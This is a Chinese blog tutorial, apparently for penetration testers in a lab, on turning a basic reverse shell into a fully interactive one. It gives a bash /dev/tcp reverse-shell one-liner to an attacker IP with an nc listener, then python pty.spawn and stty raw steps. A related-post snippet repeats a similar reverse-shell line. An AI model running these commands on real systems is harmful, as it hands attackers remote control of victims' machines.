反弹Shell升级为交互式Shel

最新推荐文章于 2024-07-24 14:08:33 发布
最新推荐文章于 2024-07-24 14:08:33 发布
阅读量1.4k 收藏 3
点赞数 1
文章标签: 经验分享 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46622976/article/details/124446922
版权

前言


经常我们拿到的shell是一个简单的shell

如何把一个简单的shell就升级到一个标准交互式shell

写这篇文章记录一下

正文


攻击机:kali
靶机:ubuntu

普通Shell
给kali弹shell

bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 

kali:nc -lvvp 4444

然后发现这个shell有很多问题

无法使用vim等文本编辑器
不能补全
不能su
没有向上箭头使用历史
等等

 

半交互式Shell


对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端,命令如下:

python -c 'import pty; pty.spawn("/bin/bash")' 
在创建完成后,我们此时就可以运行su命令了

 

但是还是存在很多问题

无法使用vim等文本编辑器
不能补全
没有向上箭头使用历史


完全交互式Shell


命令:

$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
$ stty raw -echo
$ fg
$ reset
$ export SHELL=bash
//$ export TERM=xterm-256color

 

此时已经拥有了一个完全交互式Shell,就可以使用上下左右,vi,tab补全等等一系列操作,并且按Ctrl-c也不会退出。

 

相关命令解析


stty -echo #禁止回显,当在键盘上输入时,并不出现在屏幕上
stty echo #打开回显
stty raw #设置原始输入
stty -raw #关闭原始输入

bg 将一个在后台暂停的命令,变成继续执行

fg 将后台中的命令调至前台继续运行

jobs 查看当前有多少在后台运行的命令

ctrl + z
可以将一个正在前台执行的命令放到后台,并且暂停

clear
这个命令将会刷新屏幕,本质上只是让终端显示页向后翻了一页,如果向上滚动屏幕还可以看到之前的操作信息。
 
reset
这个命令将完全刷新终端屏幕,之前的终端输入操作信息将都会被清空

306Safe
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
反弹shell升级交互式shell
nihao_ma_的博客
12-29 738
此时有个问题,输入reset之后回车会乱码^M。查看系统使用的shell解析器,需要改为bash并重启系统。半交互式shell问题:1、vi编辑文件不方便;2、命令行上下左右乱码;
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 1963
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
Shell】重定向以及基础的bash反弹shell的学习
BrosyveryOK的博客
09-14 1678
最近学了下shell脚本的编写,看见重定向想起前几天反弹shell的一道题,当时还看不太懂,学完重定向之后就有点能看懂了,写篇文章记录一下。
linux 反弹shell 教程,浅析Linux之bash反弹shell原理
weixin_29716207的博客
05-04 448
环境攻击机:kali ip:192.168.25.144靶 机:centos ip:192.168.25.142过程kali 监听本地8888端口靶机 centos 写入 反弹shell 的命令bash -i >& /dev/tcp/192.168.25.144/8888 0>&1攻击机 kali 成功反弹shell原理反弹shel...
使用python和bash反弹shell的方法详解
weixin_45588247的博客
07-20 3124
实验名称:实验(反向反弹) 实验环境: 攻击(攻击者)主机: Kali2020.2 虚拟机 nat 192.168.254.132 目标(受害者)主机: Centos_6.0...
反弹shell的方法和测试
weixin_43847235的博客
11-14 576
反弹shell的概念 简单理解,通常是我们主动发起请求,去访问服务器(某个IP的某个端口),比如我们常访问的web服务器:http(https)????/ip:80,这是因为在服务器上面开启了80端口的监听,我们去访问它的时候,就会给我们建立连接。而现在所谓的反弹shell指的是反过来在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,然后我们就能通过反弹shell去...
php 与shell,[转]PHP与Shell交互
weixin_29231725的博客
04-15 359
From :http://blog.csdn.net/houqd2012/article/details/8219199最近想使用PHP与Sheel进行交互。PHP控制显示和高层的逻辑结构。Sheel调用linux的底层命令来实现快速及其时效性。在网翻了一些帖子,发现一份强帖..由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面。于是PHP的设计者们给PHP加了一个门:安...
“不一样的视角“剖析linux反弹shell
Sumarua的博客
08-02 996
技术文章系列分享"不一样的视角"剖析linux反弹shell 本文的标题是"不一样的视角"剖析linux反弹shell,,和业界普遍的视角是不同的,我把它划分更细了。为啥这么做呢?说一下写这篇文章的初衷,一般反弹shell咱们根 据是否是常驻shel划分为交互式与非交互式两种。我个人认为太笼统了,比如bash-i, nc -e /bin/bash, pty , socat都是交互式反弹shell,但是他们本身有很大的不同。单拿bash -i和nc -e /bin/bash来说,都是弹bash,为啥- -个加
Linux 反弹shell(二)反弹shell的本质
djph26741的博客
06-14 200
Linux 反弹shell(二)反弹shell的本质 from:https://xz.aliyun.com/t/2549 0X00 前言 在上一篇文章Linux反弹shell(一)文件描述符与重定向,我们已经讨论过了反弹shell中最核心也是相对较难理解的部分,那么接下来我们就可以正式借反弹shell的实例分析回顾前一篇文章讲的知识,并且也加深对反弹shel...
shel.rar_shell_壳源码
09-19
强壳源码,首次发布 ,可以加密隐藏, 建议收藏那个,自动化指令生成
Interop.Shell32
12-26
标签中的"Interop.Shel Shell32"可能是打字错误,正确的应该是"Interop.Shell32",强调了与Shell32.dll的交互。 在使用这些版本时,开发者需要注意版本兼容性问题,确保使用的"Interop.Shell32"版本与目标运行环境...
Windows shell扩展程序
10-21
关于什么叫Windows shell扩展程序,这里不作介绍,不懂的同学请google之。这里采用的开发环境为Windows XP+sp3, VS 2005 + sp1 (应该支持VS 2005以上的VS版本,VC 6.0估计不支持)。
Windows Shell扩展编程完全指南(含代码)
10-14
第三节-如何编写为文件对象弹出提示信息框的Shell扩展 第四节 - 如何编写提供定制拖放功能的Shell扩展 第五节-如何编写添加属性页到文件属性对话框中的Shell扩展 第六节-如何编写定制”发送到”菜单的Shell扩展 ...
高级shell指南(适合想要提升自己shell能力的人)
06-10
Linux和Unix系统中,Shell是一种命令行解释器,它为用户提供了一个与操作系统交互的界面。高级Shell指南针对那些希望深入理解和充分利用Shell功能的用户,旨在提升他们的Shell编程技巧和效率。下面,我们将深入...
Docker Compose V2 安装 ClickHouse v20.6.8.5 经验分享
我不懂,可我不傻
07-23 742
ClickHouse 是一款开源的分布式列式数据库管理系统,专门设计用于高性能的大数据分析和查询。目前项目中用到的一个场景是将mongo的数据同步到clickhouse,使用clickhouse做报表,后续也将分享同步和使用方案使用 Docker Compose 部署单机版,小项目和自己测试够用了,生产使用集群,基于此方案后续有需要我再尝试整理自定义配置文件文档,自定义放到 config.d/.xml,用户配置放到 users.d/.xml添加集群配置文件:metrika.xml (单机版)
大坝安全监测设备有哪些主要功能?
最新发布
yyth13276363312的博客
07-24 253
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
如何避免蓝屏?轻量部署,安全和业务连续性才能两不误
亚信安全官方账号的博客
07-23 635
轻量部署,安全和业务连续性才能两不误
深入理解Kubescape: Kubernetes安全平台与容器镜像漏洞修复
TechEnthusiast的博客
07-23 235
Kubescape是一个开源的Kubernetes安全平台,由ARMO公司开发并维护。风险分析安全合规性检查配置错误扫描容器镜像漏洞扫描和修复Kubescape的优势在于其全面性和易用性。它不仅能够识别问题,还能提供修复建议,甚至在某些情况下自动进行修复。Kubescape作为一个全面的Kubernetes安全平台,其镜像修复功能为用户提供了强大的工具来应对容器安全挑战。通过自动化的漏洞扫描和修复流程,它大大降低了维护Kubernetes环境安全性的复杂度和工作量。
Linux Shel中的变量分为什么变量
06-12
Linux Shell 中的变量分为以下四种类型: 1. 用户自定义变量(User-defined Variables):由用户自己定义的变量,使用时需要先赋值,格式为 `variable_name=value`,其中 `variable_name` 是变量名,`value` 是变量的值。 2. 环境变量(Environment Variables):是由操作系统或者用户指定的变量,用于存储系统的状态信息和环境配置,可以在 Shell 脚本中直接使用,格式为 `variable_name=value`,其中 `variable_name` 是变量名,`value` 是变量的值。 3. 位置参数变量(Positional Parameters):在 Shell 脚本中调用命令时,可以传递参数,这些参数可以通过位置参数变量获取,位置参数变量包括 `$0`、`$1`、`$2`、`$3` 等,其中 `$0` 表示脚本名称,`$1` 表示第一个参数,依此类推。 4. 预定义变量(Predefined Variables):是 Shell 环境中预先定义好的变量,可以直接使用,常见的预定义变量有 `$HOME`、`$USER`、`$SHELL`、`$PATH`、`$PWD`、`$OLDPWD`、`$HOSTNAME`、`$PS1` 等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

306Safe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值